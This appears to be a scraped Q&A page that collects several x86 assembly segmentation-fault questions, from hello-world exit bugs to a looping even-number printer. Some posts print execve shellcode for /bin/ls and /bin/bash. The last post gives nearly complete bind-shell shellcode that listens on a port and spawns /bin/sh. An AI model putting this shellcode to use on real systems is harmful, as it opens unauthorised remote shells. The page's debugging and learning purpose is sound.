This question already has answers here:
Nasm segmentation fault on RET in _start
(1 answer)
Assembly segmentation fault after making a system call, at the end of my code
(1 answer)
Closed 4 years ago.
Program received signal SIGSEGV, Segmentation fault.
I am using this assembly program:
and for some reason I'm getting a segmentation fault, is it related to the stack? What does this program even supposed to output? somebody told me to run it and see what it does, any ideas?
I thought it would be problematic and made a post about it, but it wasn't a problem, I tried debugging it with GDB and that didn't really help. If you could tell me what it outputs it would probably even be better, that's what I'm really looking for
.code32
.intel_syntax noprefix
.global _start
_start:
mov eax, 0x04
push eax
mov eax, 0x2d
push eax
call asm2
asm2:
push ebp
mov ebp, esp
sub esp, 0x10
mov eax, DWORD PTR [ebp + 0xc] --- seg fault here
mov DWORD PTR [ebp-0x4], eax
mov eax, DWORD PTR[ebp+0x8]
mov DWORD PTR [ebp-0x8], eax
jmp part_b
part_a:
add DWORD PTR [ebp - 0x4], 0x1
add DWORD PTR [ebp + 0x8], 0x64
part_b:
cmp DWORD PTR [ebp+0x8], 0x1d89
jle part_a
mov eax, DWORD PTR [ebp-0x4]
mov esp, ebp
pop ebp
ret
Related
Basically I am trying to execute the command /bin/ls using assembly, but unfortunately I am failing:
SECTION .data
buf: db "Hello", 5
SECTION .text
global _start
_start:
xor eax, eax
mov edx, eax
push edx
mov eax, 0x736c2f2f ; "sl/"
push eax
mov eax, 0x6e69622f ; "nib/"
push eax
mov ebx, esp
push edx
mov eax, 0x2f
push eax
mov ecx, esp
mov eax, 11
xor edx, edx
int 0x80
mov eax, 1
int 0x80
But If I change the mov eax, 11 to mov eax, 4 and add mov edx, 7 after xor edx, edx. It do print /bin/ls
Can anyone point the mistake I am making?
Compiling the code with nasm -g -f elf -F dwarf ./shell.asm && ld -m elf_i386 -o shell shell.o and my arc is Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
Found the problem, as pointed by #Jestor (thank you), I needed to store the executing file at ebx and all the arguments including the filename in ecx and set edx to null as below:
SECTION .data
buf: db "./", 0
SECTION .text
global _start
_start:
xor eax, eax
xor edx, edx
push eax
push long 0x736c2f2f ; "sl/"
push long 0x6e69622f ; "nib/"
mov ebx, esp
push eax
push byte 0x2f
mov esi, esp
push eax
push esi
push ebx
mov ecx, esp
mov eax, 0x0b
int 0x80
mov eax, 1
int 0x80
after my working shell, the ecx looked like below:
(gdb) x/50x $ecx
0xffffd370: 0xffffd384 0xffffd37c 0x00000000 0x0000002f
0xffffd380: 0x00000000 0x6e69622f 0x736c2f2f 0x00000000
I was experimenting and have the following assembly code, which works very well, except that I get a "Segmentation fault (core dumped)" message right before my program ends:
GLOBAL _start
%define ___STDIN 0
%define ___STDOUT 1
%define ___SYSCALL_WRITE 0x04
segment .data
segment .rodata
L1 db "hello World", 10, 0
segment .bss
segment .text
_start:
mov eax, ___SYSCALL_WRITE
mov ebx, ___STDOUT
mov ecx, L1
mov edx, 13
int 0x80
It doesn't matter whether or not I have ret at the end; I still get the message.
What's the problem?
I'm using x86 and nasm.
You can't ret from start; it isn't a function and there's no return address on the stack. The stack pointer points at argc on process entry.
As n.m. said in the comments, the issue is that you aren't exiting the program, so execution runs off into garbage code and you get a segfault.
What you need is:
;; Linux 32-bit x86
%define ___SYSCALL_EXIT 1
// ... at the end of _start:
mov eax, ___SYSCALL_EXIT
mov ebx, 0
int 0x80
(The above is 32-bit code. In 64-bit code you want mov eax, 231 (exit_group) / syscall, with the exit status in EDI. For example:
;; Linux x86-64
xor edi, edi ; or mov edi, eax if you have a ret val in EAX
mov eax, 231 ; __NR_exit_group
syscall
I'm writing an assembly program that would print even numbers between 0-9 using a loop. I encountered this problem, segmentation fault while running the code. I check other answers on the site but couldn't find an answer that satisfies my issue.
I suspect that the function nwLine might be the source of the problem.
;;this program prints even numbers from 0-8 using loop function
section .text
global _start
cr db 10
_start: ;tell linker entry point
mov ecx, 5
mov eax, '0'
evenLoop:
mov [evnum], eax ;add eax to evnum
mov eax, 4
mov ebx, 1
push ecx
mov ecx, evnum
mov edx, 1
int 80h
call nwLine
mov eax, [evnum]
sub eax, '1'
inc eax
add eax, '2'
pop ecx
loop evenLoop
nwLine: ;function to move pointer to next line
mov eax,4 ; System call number(sys_write)
mov ebx,1 ; File descriptor 1 - standard output
mov ecx, cr
mov edx, 1
int 80h ; Call the kernel
ret
mov eax,1 ;system call number (sys_exit)
int 80h ;call kernel
section .bss
evnum resb 1
if anyone knows how to solve the problem with the nwLine function, please tell me.
This question already has an answer here:
execve shellcode linux segmentation fault
(1 answer)
Closed 7 years ago.
Any idea why this is causing a segfault? mov byte [esi +9], bl
I went through it line by line using the debugger and they segfault appears after it executes that line.
Which I guess means its trying to access something in memory that its not suppose to.
Here is the whole code:
global _start
section .text
_start:
jmp short call_shellcode
shellcode:
pop esi
xor ebx, ebx
mov byte [esi +9], bl
mov dword [esi +10], esi
mov dword [esi +14], ebx
lea ebx, [esi]
lea ecx, [esi +10]
lea edx, [esi +14]
xor eax, eax
mov al, 0xb
int 0x80
call_shellcode:
call shellcode
message db "/bin/bashABBBBCCCC"
By default the text section is not writeable, and the data section is not executable.
I am trying to open a listener using shellcode but i get segmentation error , i read that this error is due to writing into read only location in memory , and that -N option in the ld linker will solve it out which did not work for me.
the code :
BITS 32
global _start
_start:
xor eax,eax
xor ebx,ebx
cdq
push eax
push byte 0x01
push byte 0x02
mov ecx,esp
inc bl
mov al,102
int 80h
mov esi,eax
push edx
push 0xAAAA02AA
mov ecx,esp
push byte 0x10
push ecx
push esi
mov ecx,esp
inc bl
mov al,102
int 80h
push edx
push esi
mov ecx,esp
mov byte bl,0x04
mov al,102
int 80h
push edx
push edx
push esi
mov ecx,esp
inc bl
mov al,102
int 80h
mov ebx,esp
xor ecx,ecx
mov cl,3
loop:
dec cl
mov al,63
int 80h
jnz loop
push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0x0b
int 80h
i then run the following commands:
nasm -f elf file.asm
ld -N file.o -o file
when i run file i get segmentation error, please help .
Learn to use a debugger and comment your code. That said, the problem seems to be with the dup2 syscall getting bad argument, because esp that gets loaded into ebx is unlikely to be a valid descriptor. This results in an error return, which then screws up all further syscalls.